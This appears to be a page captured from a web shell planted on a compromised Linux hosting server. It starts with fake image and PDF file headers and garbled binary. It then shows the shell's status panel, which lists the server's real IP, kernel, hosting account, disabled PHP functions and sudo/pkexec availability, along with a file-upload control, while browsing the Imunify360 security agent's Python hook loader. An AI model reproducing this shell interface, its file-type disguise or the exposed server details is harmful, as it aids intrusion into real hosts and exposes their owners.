ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 157.90.209.209 / Your IP : 216.73.216.148 [ Web Server : Apache System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64 User : evidenciarevista ( 1049) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Domains : 216 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /opt/imunify360/venv/lib/python3.11/site-packages/defence360agent/hooks/ |
Upload File : |
import importlib.util import os from collections import namedtuple ENTRYPOINT = "im_hook" ModuleInfo = namedtuple("ModuleInfo", ("object", "mtime", "ctime")) modules: dict[str, ModuleInfo] = {} def import_hook(path): file_stat = os.stat(path) if ( path in modules and modules[path].mtime == file_stat.st_mtime and modules[path].ctime == file_stat.st_ctime ): return modules[path].object spec = importlib.util.spec_from_file_location(path, path) hook_module = importlib.util.module_from_spec(spec) spec.loader.exec_module(hook_module) modules[path] = ModuleInfo( object=hook_module, mtime=file_stat.st_mtime, ctime=file_stat.st_ctime ) return hook_module def remove_hook(path): if path in modules: modules.pop(path) def execute_hook(path, dict_param): hook_module = import_hook(path) entrypoint = getattr(hook_module, ENTRYPOINT) return entrypoint(dict_param)